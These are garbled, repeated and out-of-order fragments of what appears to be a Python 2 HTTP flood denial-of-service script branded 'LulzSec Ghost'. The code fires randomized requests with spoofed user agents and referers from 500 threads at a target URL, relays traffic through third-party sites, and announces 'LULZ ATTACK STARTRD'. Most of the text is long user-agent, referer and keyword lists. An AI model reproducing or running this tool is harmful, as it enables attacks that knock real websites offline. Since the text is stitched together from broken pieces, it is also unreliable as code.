useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "(Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac", "// // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _//", "headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0", "(http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U;", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS", "headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43)", "\\,;' \\ ,\\ / \\: `:\\ \\ // `:`. ,' \\ /-._; |", "robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0", "try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print", "dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52", "(Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c", "4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux;", "(GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink", "# monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while", "len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script", "+ '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\")", "headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT')", "Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita", "(KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') #", "bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\")", "NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux;", "engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)')", "keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/')", "request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError,", "The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / |", "request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~'", "like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19", "headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2;", "4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0", "except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread", "Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4", "(compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0;", "(Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;')", "keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch')", "Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1", "/`-._| | | || ' : `.`.) _,' |;._:: | | | |", "= re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t = HTTPThread()", "headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0')", "<EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami", "param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')", "EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com", "headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12", "(compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')", "#global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')", "headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia", "// // ~~ _// _// _// ~ _// ~ ~ / / /", "2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada", "rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30", "\"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\"", "headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi", "headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=')", "NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0;", "X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64;", "ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0", "libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0')", "print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e:", "(PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like", "httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url +", "def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\")", "Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0;", "rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')", "\\ \\,;' \\ ,\\ / \\: `:\\ \\ // `:`. ,' \\ /-._;", "; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)')", "headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)')", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,", ":: /`-._| | | || ' : `.`.) _,' |;._:: | | |", "(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR", "/ / / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def", "// // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // // ~~ _// _//", "(Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0", "(Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)')", "3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64;", "LulzSec Ghost' print \"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL |: <____|.----||", "OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev.", "headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo", "(http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)')", "headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By", "V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet", "\\ /-._; | : : :: ,. . ,' :: /`-._| | |", "Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial", "Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us;", "Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine", "PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1)", "Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;", "NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2;", "+ buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer',", "keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung", "rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac", "headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list():", "Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)')", "headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds')", "referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=')", "print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else:", "m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t =", "Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "(Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12", "Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119", "Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET", "keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american", "headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2", "headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6;", "1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/", "4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android", "epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0')", "Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3)", "| | : \\ `--. ) /|-._: : | \\ \\ / /", "8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by", "headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites')", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0", "bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def", "_..-'''/ / | \\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\", "headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')", "(Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30')", "Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET", "out_str = '' for i in range(0, size): a = random.randint(65, 90) out_str", "Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG", "\\: `:\\ \\ // `:`. ,' \\ /-._; | : : :: ,.", "headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat", "headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') 